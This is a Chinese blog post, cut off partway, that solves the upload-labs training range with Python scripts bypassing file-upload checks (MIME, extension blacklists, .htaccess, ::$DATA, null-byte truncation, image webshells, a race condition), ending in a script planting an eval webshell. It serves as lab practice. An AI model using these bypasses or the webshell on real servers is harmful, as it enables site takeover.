<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sunian19.github.io","root":"/","scheme":"Gemini","version":"7.7.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="最近一直在练习python，索性用python写脚本通关upload-labs，后面几关实在能力有限，实现不了。每一关测试完，我都会删除upload下的文件，如果你没成功，请锤爆我的头。 第1、2关通用(前端JS,MIME类型验证)第一关是JS前端验证，我们直接发包可以忽略掉第二关是MIME类型验证，我设置了image&#x2F;jpeg，也可绕过">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;upload靶场通关(利用python脚本)&#39;">
<meta property="og:url" content="https://sunian19.github.io/2020/04/13/upload-labs/index.html">
<meta property="og:site_name" content="Sunian&#39;s Blog">
<meta property="og:description" content="最近一直在练习python，索性用python写脚本通关upload-labs，后面几关实在能力有限，实现不了。每一关测试完，我都会删除upload下的文件，如果你没成功，请锤爆我的头。 第1、2关通用(前端JS,MIME类型验证)第一关是JS前端验证，我们直接发包可以忽略掉第二关是MIME类型验证，我设置了image&#x2F;jpeg，也可绕过">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/p63.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p64.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p80.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p81.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p82.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p83.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p87.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p88.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p89.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p85.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p86.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p90.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p91.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p93.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p94.png">
<meta property="article:published_time" content="2020-04-13T13:54:41.000Z">
<meta property="article:modified_time" content="2020-05-03T08:15:31.254Z">
<meta property="article:author" content="素念">
<meta property="article:tag" content="靶场">
<meta property="article:tag" content="python">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/p63.png">

<link rel="canonical" href="https://sunian19.github.io/2020/04/13/upload-labs/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>'upload靶场通关(利用python脚本)' | Sunian's Blog</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d70c2fd321d2281d853a9197812a8f28";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>
    <a target="_blank" rel="noopener" href="https://github.com/sunian19" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#70B7FD; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sunian's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2020/04/13/upload-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="素念">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sunian's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          'upload靶场通关(利用python脚本)'
        </h1>

        <div class="post-meta">
        
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-04-13 21:54:41" itemprop="dateCreated datePublished" datetime="2020-04-13T21:54:41+08:00">2020-04-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-05-03 16:15:31" itemprop="dateModified" datetime="2020-05-03T16:15:31+08:00">2020-05-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" itemprop="url" rel="index"><span itemprop="name">文件上传</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>最近一直在练习python，索性用python写脚本通关upload-labs，后面几关实在能力有限，实现不了。<br>每一关测试完，我都会删除upload下的文件，如果你没成功，请锤爆我的头。</p>
<h3 id="第1、2关通用-前端JS-MIME类型验证"><a href="#第1、2关通用-前端JS-MIME类型验证" class="headerlink" title="第1、2关通用(前端JS,MIME类型验证)"></a>第1、2关通用(前端JS,MIME类型验证)</h3><p>第一关是JS前端验证，我们直接发包可以忽略掉<br>第二关是MIME类型验证，我设置了image/jpeg，也可绕过</p>
<a id="more"></a>

<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-01/index.php&quot;</span></span><br><span class="line">geturl=<span class="string">&quot;http://192.168.136.133/upload/upload/phpinfo.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.php&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">data=&#123;<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;上传&#x27;</span>&#125;</span><br><span class="line">r=requests.post(url=url,data=data,files=file)</span><br><span class="line">r1=requests.get(url=geturl)</span><br><span class="line"><span class="keyword">if</span> r1.status_code==<span class="number">200</span>:</span><br><span class="line">    print(<span class="string">&quot;upload success!&quot;</span>)</span><br><span class="line">    print(geturl)</span><br></pre></td></tr></table></figure></div>

<h3 id="第3关-文件各类扩展名"><a href="#第3关-文件各类扩展名" class="headerlink" title="第3关(文件各类扩展名)"></a>第3关(文件各类扩展名)</h3><p>文件扩展名绕过，httpd.conf中记得设置下图红框里的代码，不然无法解析phtml<br>这关上传之后会重命名文件，但是还是可以在源代码中看到的<br><img src="/imgss/p63.png"></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-03/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.phtml&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">data=&#123;<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;上传&#x27;</span>&#125;</span><br><span class="line">r=requests.post(url=url,data=data,files=file)</span><br><span class="line">wenjian = re.findall(<span class="string">&#x27;&lt;img src=&quot;../upload/(.*?)&quot; width=&quot;250px&quot; /&gt;&#x27;</span>,r.text,re.S)</span><br><span class="line">wenjian1 = <span class="string">&quot;&quot;</span>.join(wenjian)</span><br><span class="line">geturl=<span class="string">&quot;http://192.168.136.133/upload/upload/%s&quot;</span> % wenjian1</span><br><span class="line">r1=requests.get(url=geturl)</span><br><span class="line"><span class="keyword">if</span> r1.status_code==<span class="number">200</span>:</span><br><span class="line">    print(<span class="string">&quot;upload success!&quot;</span>)</span><br><span class="line">    print(geturl)</span><br></pre></td></tr></table></figure></div>

<h3 id="第4关-htaccess"><a href="#第4关-htaccess" class="headerlink" title="第4关(.htaccess)"></a>第4关(.htaccess)</h3><p>这关先上传.htaccess文件，语句含义为所有.jpg结尾的文件以PHP文件解析</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">.htaccess内容：</span><br><span class="line">（1）   &lt;FilesMatch &quot;abc&quot;&gt;</span><br><span class="line">            SetHandler application&#x2F;x-httpd-php</span><br><span class="line">            &lt;&#x2F;FilesMatch&gt;</span><br><span class="line">（将名字中包含abc的文件当作php解析）</span><br><span class="line"></span><br><span class="line">（2）AddType    application&#x2F;x-httpd-php    .jpg</span><br><span class="line">上传的jpg文件都会以php格式解析</span><br><span class="line">（3） SetHandler application&#x2F;x-httpd-php</span><br><span class="line">全部匹配php方式打开，对网站危害较大，不建议使用</span><br></pre></td></tr></table></figure></div>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-04/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.jpg&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">file1=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;.htaccess&#x27;</span>,<span class="string">&quot;AddType  application/x-httpd-php .jpg&quot;</span>,<span class="string">&#x27;application/octet-stream&#x27;</span>)&#125;</span><br><span class="line">data=&#123;<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;上传&#x27;</span>&#125;</span><br><span class="line">r=requests.post(url=url,data=data,files=file1)</span><br><span class="line">repson = requests.post(url=url,data=data,files=file)</span><br><span class="line">geturl=<span class="string">&quot;http://192.168.136.133/upload/upload/phpinfo.jpg&quot;</span></span><br><span class="line">r1=requests.get(url=geturl)</span><br><span class="line"><span class="keyword">if</span> r1.status_code==<span class="number">200</span>:</span><br><span class="line">    print(<span class="string">&quot;upload success!&quot;</span>)</span><br><span class="line">    print(geturl)</span><br></pre></td></tr></table></figure></div>

<h3 id="第5关-黑名单，大小写"><a href="#第5关-黑名单，大小写" class="headerlink" title="第5关(黑名单，大小写)"></a>第5关(黑名单，大小写)</h3><p>这关大小写绕过，使用第三关脚本进行修改即可</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-05/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.phP&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="第6关-黑名单，空格"><a href="#第6关-黑名单，空格" class="headerlink" title="第6关(黑名单，空格)"></a>第6关(黑名单，空格)</h3><p>这关利用后缀名+空格进行绕过</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-06/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.php &#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="第7关-黑名单，点"><a href="#第7关-黑名单，点" class="headerlink" title="第7关(黑名单，点)"></a>第7关(黑名单，点)</h3><p>利用windows特性，会自动去掉后缀名中最后的”.”，可在后缀名中加”.”绕过</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-07/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.php.&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="第8关-黑名单，NTFS数据流"><a href="#第8关-黑名单，NTFS数据流" class="headerlink" title="第8关(黑名单，NTFS数据流)"></a>第8关(黑名单，NTFS数据流)</h3><p>利用NTFS文件流,::$DATA<br><img src="/imgss/p64.png"></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-08/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.php::$DATA&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">wenjian1 = <span class="string">&quot;&quot;</span>.join(wenjian).replace(<span class="string">&#x27;::$data&#x27;</span>,<span class="string">&#x27;&#x27;</span>)</span><br></pre></td></tr></table></figure></div>

<h3 id="第9关-黑名单，点-空格-点"><a href="#第9关-黑名单，点-空格-点" class="headerlink" title="第9关(黑名单，点+空格+点)"></a>第9关(黑名单，点+空格+点)</h3><p>还是黑名单，利用phpinfo.php. .(点+空格+点)进行绕过</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-09/index.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.php. .&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="第10关-黑名单，双写"><a href="#第10关-黑名单，双写" class="headerlink" title="第10关(黑名单，双写)"></a>第10关(黑名单，双写)</h3><p>根据第一关的代码修改</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-10/index.php&quot;</span></span><br><span class="line">geturl=<span class="string">&quot;http://192.168.136.133/upload/upload/info.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.pphphp&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">data=&#123;<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;上传&#x27;</span>&#125;</span><br><span class="line">r=requests.post(url=url,data=data,files=file)</span><br><span class="line">r1=requests.get(url=geturl)</span><br><span class="line"><span class="keyword">if</span> r1.status_code==<span class="number">200</span>:</span><br><span class="line">    print(<span class="string">&quot;upload success!&quot;</span>)</span><br><span class="line">    print(geturl)</span><br></pre></td></tr></table></figure></div>

<h3 id="第11关-00截断"><a href="#第11关-00截断" class="headerlink" title="第11关(%00截断)"></a>第11关(%00截断)</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://192.168.136.133/upload/Pass-11/index.php?save_path=../upload/phpinfo.php%00&quot;</span></span><br><span class="line">geturl=<span class="string">&quot;http://192.168.136.133/upload/upload/phpinfo.php&quot;</span></span><br><span class="line">file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;phpinfo.jpg&#x27;</span>,<span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>,<span class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">data=&#123;<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;上传&#x27;</span>&#125;</span><br><span class="line">r=requests.post(url=url,data=data,files=file)</span><br><span class="line">r1=requests.get(url=geturl)</span><br><span class="line"><span class="keyword">if</span> r1.status_code==<span class="number">200</span>:</span><br><span class="line">    print(<span class="string">&quot;upload success!&quot;</span>)</span><br><span class="line">    print(geturl)</span><br></pre></td></tr></table></figure></div>

<h3 id="第12关-hex-00截断"><a href="#第12关-hex-00截断" class="headerlink" title="第12关(hex 00截断)"></a>第12关(hex 00截断)</h3><p>这关我是真的搞了很久，脚本写不出来，需要提交16进制的00，使用binascii模块，还是不行，人已虚，用BP过吧。。。<br>save_path是通过post传进来的，还是利用00截断，但这次需要在二进制中进行修改，因为post不会像get对%00进行自动解码<br><img src="/imgss/p80.png"><br>点击hex找到+也就是2b，修改为00<br><img src="/imgss/p81.png"><br>放包，上传成功<br><img src="/imgss/p82.png"></p>
<h3 id="第13-15关-图片马"><a href="#第13-15关-图片马" class="headerlink" title="第13~15关(图片马)"></a>第13~15关(图片马)</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">制作图片马</span><br><span class="line">linux：cat 404.php &gt;&gt; 1.png</span><br><span class="line">win：copy logo.png &#x2F;b + 404.txt &#x2F;a hack.jpg</span><br></pre></td></tr></table></figure></div>
<p>直接上传就可以，我这里环境有问题，所以没有解析<br><img src="/imgss/p83.png"></p>
<h3 id="第16关-二次渲染"><a href="#第16关-二次渲染" class="headerlink" title="第16关(二次渲染)"></a>第16关(二次渲染)</h3><p>上传写入phpinfo()的图片马，然后下载下来，对比16进制，查看哪些地方没有进行渲染。<br>在没有进行渲染的地方写上我们的一句话。<br>可以看到已经将我们的<?php phpinfo();?>渲染没了。<br><img src="/imgss/p87.png"><br>我们在没有进行渲染的地方再次写入<?php phpinfo();?><br><img src="/imgss/p88.png"><br>上传后利用文件包含漏洞，不过我这里因为环境问题还是没解析，下载下来图片可以看到，我们的一句话没有进行渲染，而是保留了下来<br><img src="/imgss/p89.png"><br>具体可以看这位大佬的操作<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2657">https://xz.aliyun.com/t/2657</a></p>
<h3 id="第17关-条件竞争"><a href="#第17关-条件竞争" class="headerlink" title="第17关(条件竞争)"></a>第17关(条件竞争)</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PY"><figure class="iseeu highlight /py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> multiprocessing <span class="keyword">import</span> Pool</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">CompeteUpload</span>(<span class="params">list</span>):</span></span><br><span class="line">    url=<span class="string">&quot;http://192.168.136.133/upload/Pass-17/index.php&quot;</span></span><br><span class="line">    geturl=<span class="string">&quot;http://192.168.136.133/upload/upload/cs.php&quot;</span></span><br><span class="line">    file=&#123;<span class="string">&#x27;upload_file&#x27;</span>:(<span class="string">&#x27;cs.php&#x27;</span>,<span class="string">&quot;&lt;?php fputs(fopen(&#x27;shell.php&#x27;,&#x27;w&#x27;),&#x27;&lt;?php @eval($_POST[su]);?&gt;&#x27;);?&gt;&quot;</span>,<span 